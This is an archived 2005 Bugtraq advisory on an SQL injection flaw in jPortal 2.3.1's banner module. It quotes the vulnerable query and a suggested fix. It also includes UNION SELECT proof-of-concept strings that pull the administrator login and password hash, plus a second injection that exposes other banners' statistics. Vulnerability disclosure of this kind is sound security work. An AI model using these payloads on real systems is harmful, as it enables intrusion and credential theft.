[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Sql injection in jPortal version 2.3.1 (module banner)
From:       "Marcin \"CiNU5\" Krupowicz" <marcin.krupowicz () gmail ! com>
Date:       2005-04-12 7:13:14
Message-ID: 7bde5fe3050412001349bb7c58 () mail ! gmail ! com
[Download RAW message or body]

Hello BugTraq,

I've found possibility to inject sql code in jPortal version 2.3.1, in
module "banner" (module/banner.inc.php).

Bug is in these lines of code:
$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";
(line 192)

There is unfiltered variable $haslo. In order to patch this code just add this:
$haslo = addslashes($haslo); before above line.

PoC:
go to http://[victim]/jportal/banner.php and try this:
' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where '1=1
and then:
' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where '1=1
After that, You gain login and md5 hash password of administrator.


PoC 2:
try to inject this code:
' or id='x    x - banner id
After that, You can see statistics of not banners, to which you
haven't got passwords.

Vendor (http://jportal2.com) has been informed already.

-- 
Best regards,
Marcin "CiNU5" Krupowicz
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic